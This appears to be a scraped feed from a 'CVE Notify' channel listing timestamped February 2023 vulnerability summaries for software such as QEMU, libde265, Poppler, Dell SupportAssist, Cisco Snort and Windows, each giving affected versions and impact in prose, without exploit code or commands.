🚨 CVE-2015-5225Buffer overflow in the vnc_refresh_server_surface function in the VNC display driver in QEMU before 2.4.0.1 allows guest users to cause a denial of service (heap memory corruption and process crash) or possibly execute arbitrary code on the host via unspecified vectors, related to refreshing the server display surface.🎖@cveNotify |
|
| 2023-02-13 02:29:50 |
🚨 CVE-2015-5260Heap-based buffer overflow in SPICE before 0.12.6 allows guest OS users to cause a denial of service (heap-based memory corruption and QEMU-KVM crash) or possibly execute arbitrary code on the host via QXL commands related to the surface_id parameter.🎖@cveNotify |
|
| 2023-02-13 02:29:49 |
🚨 CVE-2015-5245CRLF injection vulnerability in the Ceph Object Gateway (aka radosgw or RGW) in Ceph before 0.94.4 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via a crafted bucket name.🎖@cveNotify |
|
| 2023-02-13 00:30:00 |
🚨 CVE-2022-2990An incorrect handling of the supplementary groups in the Buildah container engine might lead to the sensitive information disclosure or possible data modification if an attacker has direct access to the affected container where supplementary groups are used to set access permissions and is able to execute a binary code in that container.🎖@cveNotify |
|
| 2023-02-13 00:29:59 |
🚨 CVE-2022-23451An authorization flaw was found in openstack-barbican. The default policy rules for the secret metadata API allowed any authenticated user to add, modify, or delete metadata from any secret regardless of ownership. This flaw allows an attacker on the network to modify or delete protected data, causing a denial of service by consuming protected resources.🎖@cveNotify |
|
| 2023-02-13 00:29:58 |
🚨 CVE-2022-25308A stack-based buffer overflow flaw was found in the Fribidi package. This flaw allows an attacker to pass a specially crafted file to the Fribidi application, which leads to a possible memory leak or a denial of service.🎖@cveNotify |
|
| 2023-02-13 00:29:54 |
🚨 CVE-2022-2735A vulnerability was found in the PCS project. This issue occurs due to incorrect permissions on a Unix socket used for internal communication between PCS daemons. A privilege escalation could happen by obtaining an authentication token for a hacluster user. With the "hacluster" token, this flaw allows an attacker to have complete control over the cluster managed by PCS.🎖@cveNotify |
|
| 2023-02-13 00:29:53 |
🚨 CVE-2022-25309A heap-based buffer overflow flaw was found in the Fribidi package and affects the fribidi_cap_rtl_to_unicode() function of the fribidi-char-sets-cap-rtl.c file. This flaw allows an attacker to pass a specially crafted file to the Fribidi application with the '--caprtl' option, leading to a crash and causing a denial of service.🎖@cveNotify |
|
| 2023-02-13 00:29:52 |
🚨 CVE-2022-23452An authorization flaw was found in openstack-barbican, where anyone with an admin role could add secrets to a different project container. This flaw allows an attacker on the network to consume protected resources and cause a denial of service.🎖@cveNotify |
|
| 2023-02-13 00:29:48 |
🚨 CVE-2022-2319A flaw was found in the Xorg-x11-server. An out-of-bounds access issue can occur in the ProcXkbSetGeometry function due to improper validation of the request length.🎖@cveNotify |
|
| 2023-02-13 00:29:47 |
🚨 CVE-2022-2739The version of podman as released for Red Hat Enterprise Linux 7 Extras via RHSA-2022:2190 advisory included an incorrect version of podman missing the fix for CVE-2020-14370, which was previously fixed via RHSA-2020:5056. This issue could possibly allow an attacker to gain access to sensitive information stored in environment variables.🎖@cveNotify |
|
| 2023-02-13 00:29:46 |
🚨 CVE-2022-2320A flaw was found in the Xorg-x11-server. The specific flaw exists within the handling of ProcXkbSetDeviceInfo requests. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. This flaw allows an attacker to escalate privileges and execute arbitrary code in the context of root.🎖@cveNotify |
|
| 2023-02-13 00:29:43 |
🚨 CVE-2022-1902A flaw was found in the Red Hat Advanced Cluster Security for Kubernetes. Notifier secrets were not properly sanitized in the GraphQL API. This flaw allows authenticated ACS users to retrieve Notifiers from the GraphQL API, revealing secrets that can escalate their privileges.🎖@cveNotify |
|
| 2023-02-13 00:29:42 |
🚨 CVE-2022-2738The version of podman as released for Red Hat Enterprise Linux 7 Extras via RHSA-2022:2190 advisory included an incorrect version of podman missing the fix for CVE-2020-8945, which was previously fixed via RHSA-2020:2117. This issue could possibly be used to crash or cause potential code execution in Go applications that use the Go GPGME wrapper library, under certain conditions, during GPG signature verification.🎖@cveNotify |
|
| 2023-02-13 00:29:41 |
🚨 CVE-2022-2520A flaw was found in libtiff 4.4.0rc1. There is a sysmalloc assertion fail in rotateImage() at tiffcrop.c:8621 that can cause program crash when reading a crafted input.🎖@cveNotify |
|
| 2023-02-12 07:29:59 |
🚨 CVE-2023-0675A vulnerability, which was classified as critical, was found in Calendar Event Management System 2.3.0. This affects an unknown part. The manipulation of the argument start/end leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220197 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-12 07:29:57 |
🚨 CVE-2015-10072A vulnerability classified as problematic was found in NREL api-umbrella-web 0.7.1. This vulnerability affects unknown code of the component Flash Message Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.8.0 is able to address this issue. The name of the patch is bcc0e922c61d30367678c8f17a435950969315cd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-220060.🎖@cveNotify |
|
| 2023-02-12 07:29:56 |
🚨 CVE-2023-0676Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to 1.5.1.🎖@cveNotify |
|
| 2023-02-12 07:29:55 |
🚨 CVE-2023-0677Cross-site Scripting (XSS) - Reflected in GitHub repository phpipam/phpipam prior to v1.5.1.🎖@cveNotify |
|
| 2023-02-12 07:29:54 |
🚨 CVE-2022-25728Information disclosure in modem due to buffer over-read while processing response from DNS server🎖@cveNotify |
|
| 2023-02-12 07:29:53 |
🚨 CVE-2022-33216Transient Denial-of-service in Automotive due to improper input validation while parsing ELF file.🎖@cveNotify |
|
| 2023-02-12 07:29:52 |
🚨 CVE-2022-33225Memory corruption due to use after free in trusted application environment.🎖@cveNotify |
|
| 2023-02-12 07:29:51 |
🚨 CVE-2022-33277Memory corruption in modem due to buffer copy without checking size of input while receiving WMI command.🎖@cveNotify |
|
| 2023-02-12 07:29:50 |
🚨 CVE-2022-34146Transient DOS due to improper input validation in WLAN Host while parsing frame during defragmentation.🎖@cveNotify |
|
| 2023-02-12 07:29:49 |
🚨 CVE-2022-38396HP Factory Preinstalled Images on certain systems that shipped with Windows 10 versions 20H2 and earlier OS versions might allow escalation of privilege via execution of certain files outside the restricted path. This potential vulnerability was remediated starting with Windows 10 versions 21H2 on October 31, 2021.🎖@cveNotify |
|
| 2023-02-12 07:29:48 |
🚨 CVE-2022-38674In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-02-12 07:29:47 |
🚨 CVE-2022-38681In wlan driver, there is a possible missing params check. This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2023-02-12 07:29:46 |
🚨 CVE-2022-25729Memory corruption in modem due to improper length check while copying into memory🎖@cveNotify |
|
| 2023-02-12 07:29:44 |
🚨 CVE-2022-25733Denial of service in modem due to null pointer dereference while processing DNS packets🎖@cveNotify |
|
| 2023-02-12 07:29:40 |
🚨 CVE-2022-25734Denial of service in modem due to missing null check while processing IP packets with padding🎖@cveNotify |
|
| 2023-02-12 07:29:39 |
🚨 CVE-2022-25738Information disclosure in modem due to buffer over-red while performing checksum of packet received🎖@cveNotify |
|
| 2023-02-12 07:29:38 |
🚨 CVE-2022-43869IBM Spectrum Scale (5.1.0.0 through 5.1.2.8 and 5.1.3.0 through 5.1.5.1) and IBM Elastic Storage System (6.1.0.0 through 6.1.2.4 and 6.1.3.0 through 6.1.4.1) could allow an authenticated user to cause a denial of service through the GUI using a format string attack. IBM X-Force ID: 239539.🎖@cveNotify |
|
| 2023-02-12 07:29:37 |
🚨 CVE-2022-44421In wlan driver, there is a possible missing permission check. This could lead to local In wlan driver, information disclosure.🎖@cveNotify |
|
| 2023-02-12 07:29:36 |
🚨 CVE-2022-33243Memory corruption due to improper access control in Qualcomm IPC.🎖@cveNotify |
|
| 2023-02-12 00:29:38 |
🚨 CVE-2022-32595In widevine, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446236; Issue ID: ALPS07446236.🎖@cveNotify |
|
| 2023-02-11 20:30:03 |
🚨 CVE-2021-24581The Blue Admin WordPress plugin through 21.06.01 does not sanitise or escape its "Logo Title" setting before outputting in a page, leading to a Stored Cross-Site Scripting issue. Furthermore, the plugin does not have CSRF check in place when saving its settings, allowing the issue to be exploited via a CSRF attack.🎖@cveNotify |
|
| 2023-02-11 20:30:01 |
🚨 CVE-2021-34427In Eclipse BIRT versions 4.8.0 and earlier, an attacker can use query parameters to create a JSP file which is accessible from remote (current BIRT viewer dir) to inject JSP code into the running instance.🎖@cveNotify |
|
| 2023-02-11 20:30:00 |
🚨 CVE-2019-10430Jenkins NeuVector Vulnerability Scanner Plugin 1.5 and earlier stored credentials unencrypted in its global configuration file on the Jenkins master where they could be viewed by users with access to the master file system.🎖@cveNotify |
|
| 2023-02-11 20:29:59 |
🚨 CVE-2019-9959The JPXStream::init function in Poppler 0.78.0 and earlier doesn't check for negative values of stream length, leading to an Integer Overflow, thereby making it possible to allocate a large memory chunk on the heap, with a size controlled by an attacker, as demonstrated by pdftocairo.🎖@cveNotify |
|
| 2023-02-11 20:29:57 |
🚨 CVE-2023-0127A command injection vulnerability in the firmware_update command, in the device's restricted telnet interface, allows an authenticated attacker to execute arbitrary commands as root.🎖@cveNotify |
|
| 2023-02-11 20:29:56 |
🚨 CVE-2023-0782A vulnerability was found in Tenda AC23 16.03.07.45 and classified as critical. Affected by this issue is the function formSetSysToolDDNS/formGetSysToolDDNS of the file /bin/httpd. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-220640.🎖@cveNotify |
|
| 2023-02-11 20:29:54 |
🚨 CVE-2023-0783A vulnerability was found in EcShop 4.1.5. It has been classified as critical. This affects an unknown part of the file /ecshop/admin/template.php of the component PHP File Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-220641 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-11 20:29:53 |
🚨 CVE-2018-20650A reachable Object::dictLookup assertion in Poppler 0.72.0 allows attackers to cause a denial of service due to the lack of a check for the dict data type, as demonstrated by use of the FileSpec class (in FileSpec.cc) in pdfdetach.🎖@cveNotify |
|
| 2023-02-11 20:29:52 |
🚨 CVE-2019-9903PDFDoc::markObject in PDFDoc.cc in Poppler 0.74.0 mishandles dict marking, leading to stack consumption in the function Dict::find() located at Dict.cc, which can (for example) be triggered by passing a crafted pdf file to the pdfunite binary.🎖@cveNotify |
|
| 2023-02-11 20:29:50 |
🚨 CVE-2018-19058An issue was discovered in Poppler 0.71.0. There is a reachable abort in Object.h, will lead to denial of service because EmbFile::save2 in FileSpec.cc lacks a stream check before saving an embedded file.🎖@cveNotify |
|
| 2023-02-11 20:29:49 |
🚨 CVE-2022-38131RStudio Connect is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.🎖@cveNotify |
|
| 2023-02-11 20:29:47 |
🚨 CVE-2022-34916Apache Flume versions 1.4.0 through 1.10.0 are vulnerable to a remote code execution (RCE) attack when a configuration uses a JMS Source with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI to allow only the use of the java protocol or no protocol.🎖@cveNotify |
|
| 2023-02-11 20:29:46 |
🚨 CVE-2022-30065A use-after-free in Busybox 1.35-x's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the copyvar function.🎖@cveNotify |
|
| 2023-02-11 20:29:45 |
🚨 CVE-2021-28544Apache Subversion SVN authz protected copyfrom paths regression Subversion servers reveal 'copyfrom' paths that should be hidden according to configured path-based authorization (authz) rules. When a node has been copied from a protected location, users with access to the copy can see the 'copyfrom' path of the original. This also reveals the fact that the node was copied. Only the 'copyfrom' path is revealed; not its contents. Both httpd and svnserve servers are vulnerable.🎖@cveNotify |
|
| 2023-02-11 20:29:43 |
🚨 CVE-2018-25032zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.🎖@cveNotify |
|
| 2023-02-11 20:29:42 |
🚨 CVE-2022-1471SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization.🎖@cveNotify |
|
| 2023-02-11 20:29:40 |
🚨 CVE-2022-41854Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack.🎖@cveNotify |
|
| 2023-02-11 20:29:39 |
🚨 CVE-2022-3479A vulnerability found in nss. By this security vulnerability, nss client auth crash without a user certificate in the database and this can lead us to a segmentation fault or crash.🎖@cveNotify |
|
| 2023-02-11 20:29:38 |
🚨 CVE-2022-31765Affected devices do not properly authorize the change password function of the web interface. This could allow low privileged users to escalate their privileges.🎖@cveNotify |
|
| 2023-02-11 20:29:37 |
🚨 CVE-2022-41672In Apache Airflow, prior to version 2.4.1, deactivating a user wouldn't prevent an already authenticated user from being able to continue using the UI or API.🎖@cveNotify |
|
| 2023-02-11 18:39:09 |
CVE Notify pinned «🚨 For advertising in the channel, contact @SirMalware» |
|
| 2023-02-11 18:38:57 |
🚨 For advertising in the channel, contact @SirMalware |
|
| 2023-02-11 18:29:38 |
🚨 CVE-2015-6042Use-after-free vulnerability in the CWindow object implementation in Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."🎖@cveNotify |
|
| 2023-02-11 15:29:54 |
🚨 CVE-2022-43250Libde265 v1.0.8 was discovered to contain a heap-buffer-overflow vulnerability via put_qpel_0_0_fallback_16 in fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted video file.🎖@cveNotify |
|
| 2023-02-11 15:29:53 |
🚨 CVE-2022-43252Libde265 v1.0.8 was discovered to contain a heap-buffer-overflow vulnerability via put_epel_16_fallback in fallback-motion.cc. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted video file.🎖@cveNotify |
|
| 2023-02-11 15:29:52 |
🚨 CVE-2022-1253Heap-based Buffer Overflow in GitHub repository strukturag/libde265 prior to and including 1.0.8. The fix is established in commit 8e89fe0e175d2870c39486fdd09250b230ec10b8 but does not yet belong to an official release.🎖@cveNotify |
|
| 2023-02-11 15:29:51 |
🚨 CVE-2021-36408An issue was discovered in libde265 v1.0.8.There is a Heap-use-after-free in intrapred.h when decoding file using dec265.🎖@cveNotify |
|
| 2023-02-11 15:29:47 |
🚨 CVE-2021-36409There is an Assertion `scaling_list_pred_matrix_id_delta==1' failed at sps.cc:925 in libde265 v1.0.8 when decoding file, which allows attackers to cause a Denial of Service (DoS) by running the application with a crafted file or possibly have unspecified other impact.🎖@cveNotify |
|
| 2023-02-11 15:29:46 |
🚨 CVE-2021-36410A stack-buffer-overflow exists in libde265 v1.0.8 via fallback-motion.cc in function put_epel_hv_fallback when running program dec265.🎖@cveNotify |
|
| 2023-02-11 15:29:45 |
🚨 CVE-2021-36411An issue has been found in libde265 v1.0.8 due to incorrect access control. A SEGV caused by a READ memory access in function derive_boundaryStrength of deblock.cc has occurred. The vulnerability causes a segmentation fault and application crash, which leads to remote denial of service.🎖@cveNotify |
|
| 2023-02-11 15:29:44 |
🚨 CVE-2021-35452An Incorrect Access Control vulnerability exists in libde265 v1.0.8 due to a SEGV in slice.cc.🎖@cveNotify |
|
| 2023-02-11 15:29:43 |
🚨 CVE-2020-21595libde265 v1.0.4 contains a heap buffer overflow in the mc_luma function, which can be exploited via a crafted a file.🎖@cveNotify |
|
| 2023-02-11 15:29:39 |
🚨 CVE-2020-21598libde265 v1.0.4 contains a heap buffer overflow in the ff_hevc_put_unweighted_pred_8_sse function, which can be exploited via a crafted a file.🎖@cveNotify |
|
| 2023-02-11 15:29:38 |
🚨 CVE-2020-21601libde265 v1.0.4 contains a stack buffer overflow in the put_qpel_fallback function, which can be exploited via a crafted a file.🎖@cveNotify |
|
| 2023-02-11 15:29:37 |
🚨 CVE-2020-21602libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_bipred_16_fallback function, which can be exploited via a crafted a file.🎖@cveNotify |
|
| 2023-02-11 15:29:36 |
🚨 CVE-2020-21603libde265 v1.0.4 contains a heap buffer overflow in the put_qpel_0_0_fallback_16 function, which can be exploited via a crafted a file.🎖@cveNotify |
|
| 2023-02-11 13:30:13 |
🚨 CVE-2021-1223Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect handling of an HTTP range header. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass configured file policy for HTTP packets and deliver a malicious payload.🎖@cveNotify |
|
| 2023-02-11 13:30:11 |
🚨 CVE-2021-1224Multiple Cisco products are affected by a vulnerability with TCP Fast Open (TFO) when used in conjunction with the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect detection of the HTTP payload if it is contained at least partially within the TFO connection handshake. An attacker could exploit this vulnerability by sending crafted TFO packets with an HTTP payload through an affected device. A successful exploit could allow the attacker to bypass configured file policy for HTTP packets and deliver a malicious payload.🎖@cveNotify |
|
| 2023-02-11 13:30:10 |
🚨 CVE-2021-1236Multiple Cisco products are affected by a vulnerability in the Snort application detection engine that could allow an unauthenticated, remote attacker to bypass the configured policies on an affected system. The vulnerability is due to a flaw in the detection algorithm. An attacker could exploit this vulnerability by sending crafted packets that would flow through an affected system. A successful exploit could allow the attacker to bypass the configured policies and deliver a malicious payload to the protected network.🎖@cveNotify |
|
| 2023-02-11 13:30:08 |
🚨 CVE-2020-3299Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured File Policy for HTTP. The vulnerability is due to incorrect detection of modified HTTP packets used in chunked responses. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass a configured File Policy for HTTP packets and deliver a malicious payload.🎖@cveNotify |
|
| 2023-02-11 13:30:07 |
🚨 CVE-2020-3315Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass the configured file policies on an affected system. The vulnerability is due to errors in how the Snort detection engine handles specific HTTP responses. An attacker could exploit this vulnerability by sending crafted HTTP packets that would flow through an affected system. A successful exploit could allow the attacker to bypass the configured file policies and deliver a malicious payload to the protected network.🎖@cveNotify |
|
| 2023-02-11 13:30:04 |
🚨 CVE-2022-34384Dell SupportAssist Client Consumer (version 3.11.1 and prior), SupportAssist Client Commercial (version 3.2 and prior), Dell Command | Update, Dell Update, and Alienware Update versions before 4.5 contain a Local Privilege Escalation Vulnerability in the Advanced Driver Restore component. A local malicious user may potentially exploit this vulnerability, leading to privilege escalation.🎖@cveNotify |
|
| 2023-02-11 13:30:03 |
🚨 CVE-2022-34385SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain cryptographic weakness vulnerability. An authenticated non-admin user could potentially exploit the issue and obtain sensitive information.🎖@cveNotify |
|
| 2023-02-11 13:30:01 |
🚨 CVE-2022-34386Dell SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain cryptographic weakness vulnerability. An authenticated non-admin user could potentially exploit the issue and obtain sensitive information.🎖@cveNotify |
|
| 2023-02-11 13:30:00 |
🚨 CVE-2022-34387Dell SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain a privilege escalation vulnerability. A local authenticated malicious user could potentially exploit this vulnerability to elevate privileges and gain total control of the system.🎖@cveNotify |
|
| 2023-02-11 13:29:58 |
🚨 CVE-2022-34388Dell SupportAssist for Home PCs (version 3.11.4 and prior) and SupportAssist for Business PCs (version 3.2.0 and prior) contain information disclosure vulnerability. A local malicious user with low privileges could exploit this vulnerability to view and modify sensitive information in the database of the affected application.🎖@cveNotify |
|
| 2023-02-11 13:29:57 |
🚨 CVE-2022-34389Dell SupportAssist contains a rate limit bypass issues in screenmeet API third party component. An unauthenticated attacker could potentially exploit this vulnerability and impersonate a legitimate dell customer to a dell support technician.🎖@cveNotify |
|
| 2023-02-11 13:29:54 |
🚨 CVE-2022-34392SupportAssist for Home PCs (versions 3.11.4 and prior) contain an insufficient session expiration Vulnerability. An authenticated non-admin user can be able to obtain the refresh token and that leads to reuse the access token and fetch sensitive information.🎖@cveNotify |
|
| 2023-02-11 13:29:52 |
🚨 CVE-2022-34404Dell System Update, version 2.0.0 and earlier, contains an Improper Certificate Validation in data parser module. A local attacker with high privileges could potentially exploit this vulnerability, leading to credential theft and/or denial of service.🎖@cveNotify |
|
| 2023-02-11 13:29:50 |
🚨 CVE-2022-34444Dell PowerScale OneFS, versions 9.2.0.x through 9.4.0.x contain an information vulnerability. A remote unauthenticated attacker may potentially exploit this vulnerability to cause data leak.🎖@cveNotify |
|
| 2023-02-11 13:29:49 |
🚨 CVE-2022-34445Dell PowerScale OneFS, versions 8.2.x through 9.3.x contain a weak encoding for a password. A malicious local privileged attacker may potentially exploit this vulnerability, leading to information disclosure.🎖@cveNotify |
|
| 2023-02-11 13:29:47 |
🚨 CVE-2022-34446PowerPath Management Appliance with versions 3.3 & 3.2* contains Authorization Bypass vulnerability. An authenticated remote user with limited privileges (e.g., of role Monitoring) can exploit this issue and gain access to sensitive information, and modify the configuration.🎖@cveNotify |
|
| 2023-02-11 13:29:46 |
🚨 CVE-2022-34447PowerPath Management Appliance with versions 3.3 & 3.2*, 3.1 & 3.0* contains OS Command Injection vulnerability. An authenticated remote attacker with administrative privileges could potentially exploit the issue and execute commands on the system as the root user.🎖@cveNotify |
|
| 2023-02-11 13:29:44 |
🚨 CVE-2022-34448PowerPath Management Appliance with versions 3.3 & 3.2*, 3.1 & 3.0* contains a Cross-site Request Forgery vulnerability. An unauthenticated non-privileged user could potentially exploit the issue and perform any privileged state-changing actions.🎖@cveNotify |
|
| 2023-02-11 13:29:42 |
🚨 CVE-2022-34449PowerPath Management Appliance with versions 3.3 & 3.2* contains a Hardcoded Cryptographic Keys vulnerability. Authenticated admin users can exploit the issue that leads to view and modifying sensitive information stored in the application.🎖@cveNotify |
|
| 2023-02-11 13:29:41 |
🚨 CVE-2022-34450PowerPath Management Appliance with version 3.3 contains Privilege Escalation vulnerability. An authenticated admin user could potentially exploit this issue and gain unrestricted control/code execution on the system as root.🎖@cveNotify |
|
| 2023-02-10 20:30:51 |
🚨 CVE-2019-6614On BIG-IP 14.0.0-14.1.0.1, 13.0.0-13.1.1.4, and 12.1.0-12.1.4, internal methods used to prevent arbitrary file overwrites in Appliance Mode were not fully effective. An authenticated attacker with a high privilege level may be able to bypass protections implemented in appliance mode to overwrite arbitrary system files.🎖@cveNotify |
|
| 2023-02-10 20:30:48 |
🚨 CVE-2019-6601In BIG-IP 13.0.0, 12.1.0-12.1.3.7, 11.6.1-11.6.3.2, or 11.5.1-11.5.8, the Application Acceleration Manager (AAM) wamd process used in processing of images and PDFs fails to drop group permissions when executing helper scripts.🎖@cveNotify |
|
| 2023-02-10 20:30:46 |
🚨 CVE-2016-9675openjpeg: A heap-based buffer overflow flaw was found in the patch for CVE-2013-6045. A crafted j2k image could cause the application to crash, or potentially execute arbitrary code.🎖@cveNotify |
|
| 2023-02-10 20:30:44 |
🚨 CVE-2022-26174A remote code execution (RCE) vulnerability in Beekeeper Studio v3.2.0 allows attackers to execute arbitrary code via a crafted payload injected into the display fields.🎖@cveNotify |
|
| 2023-02-10 20:30:43 |
🚨 CVE-2022-46649Acemanager in ALEOS before version 4.16 allows a user with valid credentials to manipulate the IP logging operation to execute arbitrary shell commands on the device.🎖@cveNotify |
|
| 2023-02-10 20:30:41 |
🚨 CVE-2022-46650Acemanager in ALEOS before version 4.16 allows a user with valid credentials to reconfigure the device to expose the ACEManager credentials on the pre-login status page.🎖@cveNotify |
|
| 2023-02-10 20:30:39 |
🚨 CVE-2023-23489The Easy Digital Downloads WordPress Plugin, versions 3.1.0.2 & 3.1.0.3, is affected by an unauthenticated SQL injection vulnerability in the 's' parameter of its 'edd_download_search' action.🎖@cveNotify |
|
| 2023-02-10 20:30:38 |
🚨 CVE-2023-21748Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-02-10 20:30:36 |
🚨 CVE-2023-21750Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-02-10 20:30:35 |
🚨 CVE-2023-21772Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-02-10 20:30:33 |
🚨 CVE-2023-21773Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21774.🎖@cveNotify |
|
| 2023-02-10 20:30:31 |
🚨 CVE-2023-21774Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21749, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773.🎖@cveNotify |
|
| 2023-02-10 20:30:30 |
🚨 CVE-2023-21749Windows Kernel Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2023-21675, CVE-2023-21747, CVE-2023-21748, CVE-2023-21750, CVE-2023-21754, CVE-2023-21755, CVE-2023-21772, CVE-2023-21773, CVE-2023-21774.🎖@cveNotify |
|
| 2023-02-10 20:30:28 |
🚨 CVE-2023-21776Windows Kernel Information Disclosure Vulnerability.🎖@cveNotify |
|
| 2023-02-10 20:30:27 |
🚨 CVE-2020-28871Remote code execution in Monitorr v1.7.6m in upload.php allows an unauthorized person to execute arbitrary code on the server-side via an insecure file upload.🎖@cveNotify |
|
| 2023-02-10 20:30:24 |
🚨 CVE-2021-21469When security guidelines for SAP NetWeaver Master Data Management running on windows have not been thoroughly reviewed, it might be possible for an external operator to try and set custom paths in the MDS server configuration. When no adequate protection has been enforced on any level (e.g., MDS Server password not set, network and OS configuration not properly secured, etc.), a malicious user might define UNC paths which could then be exploited to put the system at risk using a so-called SMB relay attack and obtain highly sensitive data, which leads to Information Disclosure.🎖@cveNotify |
|
| 2023-02-10 20:30:23 |
🚨 CVE-2019-19453Wowza Streaming Engine before 4.8.5 allows XSS (issue 1 of 2). An authenticated user, with access to the proxy license editing is able to insert a malicious payload that will be triggered in the main page of server settings. This issue was resolved in Wowza Streaming Engine 4.8.5.🎖@cveNotify |
|
| 2023-02-10 20:30:21 |
🚨 CVE-2020-11110Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.🎖@cveNotify |
|
| 2023-02-10 20:30:20 |
🚨 CVE-2020-12527An issue was discovered in MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2. Improper access validation allows a logged in user to shutdown or reboot devices in his account without having corresponding permissions.🎖@cveNotify |
|
| 2023-02-10 20:30:19 |
🚨 CVE-2018-10868redhat-certification 7 does not properly restrict the number of recursive definitions of entities in XML documents, allowing an unauthenticated user to run a "Billion Laugh Attack" by replying to XMLRPC methods when getting the status of an host.🎖@cveNotify |
|
| 2023-02-10 18:29:59 |
🚨 CVE-2021-3809Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities.🎖@cveNotify |
|
| 2023-02-10 18:29:57 |
🚨 CVE-2021-4028A flaw in the Linux kernel's implementation of RDMA communications manager listener code allowed an attacker with local access to setup a socket to listen on a high port allowing for a list element to be used after free. Given the ability to execute code, a local attacker could leverage this use-after-free to crash the system or possibly escalate privileges on the system.🎖@cveNotify |
|
| 2023-02-10 18:29:56 |
🚨 CVE-2022-37616A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package before 0.8.3 for Node.js via the p variable. NOTE: the vendor states "we are in the process of marking this report as invalid"; however, some third parties takes the position that "A prototype injection/Prototype pollution is not just when global objects are polluted with recursive merge or deep cloning but also when a target object is polluted."🎖@cveNotify |
|
| 2023-02-10 18:29:55 |
🚨 CVE-2022-38046Web Account Manager Information Disclosure Vulnerability.🎖@cveNotify |
|
| 2023-02-10 18:29:54 |
🚨 CVE-2021-3808Potential security vulnerabilities have been identified in the BIOS (UEFI Firmware) for certain HP PC products, which might allow arbitrary code execution. HP is releasing firmware updates to mitigate these potential vulnerabilities.🎖@cveNotify |
|
| 2023-02-10 18:29:53 |
🚨 CVE-2023-24230A stored cross-site scripting (XSS) vulnerability in the component /formwork/panel/dashboard of Formwork v1.12.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Page title parameter.🎖@cveNotify |
|
| 2023-02-10 18:29:52 |
